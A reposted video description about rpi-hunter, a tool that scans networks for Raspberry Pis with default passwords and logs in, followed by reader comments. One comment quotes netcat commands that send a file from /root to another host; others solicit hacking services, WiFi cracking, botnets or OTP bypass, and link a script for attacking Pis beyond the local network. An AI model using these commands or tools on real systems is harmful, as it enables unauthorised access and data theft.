How Hackers Discover & Attack Raspberry Pis on a Network

March 2, 2020 by 32 Comments



How Rpi-hunter Works to Grab Credentials
Full Video: https://nulb.app/z4i8p
Subscribe to Null Byte: https://goo.gl/J6wEnH
Kody’s Twitter: https://twitter.com/KodyKinzie

Cyber Weapons Lab, Episode 084 (Recut – Partial Episode)

One of the most common mistakes a person makes with a new device is failing to change any default passwords. That leaves that device vulnerable to attack. On this episode of Cyber Weapons Lab, we’ll show you a tool that hackers and pentesters use called rpi-hunter, which can discover and attack any vulnerable Raspberry Pi on a network. While it’s meant for scanning a local network, if the Pis are connected to the internet, they’re fair game too.

Raspberry Pi 4: https://amzn.to/2PHLihL
Raspberry Pi 3 Model B+: https://amzn.to/38jg2Mq
Raspberry Pi Zero W: https://amzn.to/2TzFtE6
Other Raspberry Pis: https://amzn.to/2PG7jgO

To learn more, check out the article and more in-depth video on our website: https://nulb.app/z4i8p

Follow Null Byte on:
Twitter: https://twitter.com/nullbyte
Flipboard: https://flip.it/3.Gf_0
Website: https://null-byte.com
Weekly newsletter: https://eepurl.com/dE3Ovb
Vimeo: https://vimeo.com/channels/nullbyte

source

32 Replies to “How Hackers Discover & Attack Raspberry Pis on a Network”

  1. I HATE DEFAULT PASSWORDS AS MUCH AS I HATE ICE AGE BABY.

  2. Youtube warns against social hacking but monitors me for what I do? The pot is calling the kettle black.

  3. David Dil says:

    Hey what's wrong with password123.

  4. Nobody Knows says:

    I just got a Rasberry Pi 4 and need a micro hdmi adapter which I dont have☹

  5. T D says:

    I own a Pi but it doesn't matter! My dude Kody has my back 😎👌

  6. Pil Teyda says:

    If you need a swift fast reliable hacker for any kind of hacking service.

  7. RZX says:

    pretty much any device that uses ssh with the default password are vulnerable

  8. SabayZone says:

    I was here long enough so i know this is reupload video because the first was taking down

  9. Another awesome video. I've used angry ip scanner before around a fab lab (huge tech work shop lab warehouse full of people doing projects) and found Raspberry Pi's and then used the defaults and it worked. So many resources and tools just pick one, like this one and practice, legally of course. Thanks for the video and your amazing website guys 👌✌️👨‍💻

  10. I like your videos 👌🏻keep up

  11. Scott Newood says:

    Great Video Managed to google dork some white house videos! contact me here @scott.e YOUTUBE

  12. Techno Tips says:

    Sir.. Is their any types of vulnerabilities or techniques to crack WPA & WPA2 wifi networks password.. With out do brute force or dictionary attack on it.

  13. Johs says:

    youtube: hacking and spying is bad
    also youtube: continuously spies on viewers

  14. Mr ReD says:

    Hi , pleas make a full tutorial. how to Crack or hack WiFi password for windows user .

  15. Hi Null, I believe Hackers will always have strategies 🕵️

  16. pranav k p says:

    Hi…why hackers keeps 2 computer,One is personal computer and another is hacking mechin ??

  17. hey man, in this video you teach how use linux in windows:https://www.youtube.com/watch?v=T8Xsi0Dne8o

    but i tried to use metasploit and it didnt work 🙁 help pls

  18. Hi kody .. please can make tutorial for how hacker buy bitcoin 🙏🤷‍♂️🤷‍♂️🤷‍♂️🤷‍♂️ without OTP

  19. shavi salh says:

    Sir plz tell about book to start learning hacking from begning.

  20. Hello, my name's Adrian
    I'm a big fan of nullbyte and always read the articles whenever, I have the time. There was an article about exfiltrating data with nectat. The command looks like this:
    "Cat /root/file.txt | nc -nvlp 4444"
    "nc 192.168.100.76 4444"

    Would it be possible to exfiltrate data with no permission for Others? Such as this example:
    drwxrwx—
    How would it be possible to transfer a file such as this with nectat?

  21. Linux ? says:

    Hey guys, ive installed parrot OS my Leveno laptop and it is fully compatible and capable of running virtual instances . However, every time i clicked on to the first option which is the parrot GNU/Linux it says [drm:vmw_host_log [vmwgfx11]] ERROR Failed to send host log message. I installed the parrot os with preconfigured settings from the original site . Do you guys have any solutions to this error ?

  22. Hydro17 : says:

    Can we get a video on botnets

  23. Invitation Code : OwenTham
    Thanks!

  24. Pvp Lad says:

    Null byte how can i setup raspberry pi 3 model b to mac book

  25. Black Devil says:

    Sir, if I want to take a raspberry pie to learn hacking, which raspberry pita will be the best or the best? And how does it cost? And if I wish, can I connect to mobile and run the command of raspberry pie with mobile? Please tell me a little?

    

  26. ToxynOP says:

    BRO, PLEASE HELP US FOR HACKING KIT FOR RASPBERRY PIE 4 MODEL B (4GB RAM)….. PLEASE BRO …..PLEASE BRO…… PLEASE BRO…..

  27. BANNED says:

    I'm Back xD

  28. Thomas says:

    Hello, i've developed a litle script to do the same job outside the LAN : https://github.com/Thomas-Clauzel/rpi-search-and-attack/blob/master/rpi-search-v2.sh

  29. Mario Sameh says:

    Can you make a video on how to hack switch network plz

  30. Aditya Joshi says:

    In the beginning I thought that it was for pi's connected to your network and you have to be on the same network as well? How would you scan the entire Internet for pi's with default creds? Can this be prevented if my pi's are on seperate vlans or different ssids for a wireless network?

  31. im liking your content and the extra link to the real info requiring a bit of effort isnt bad.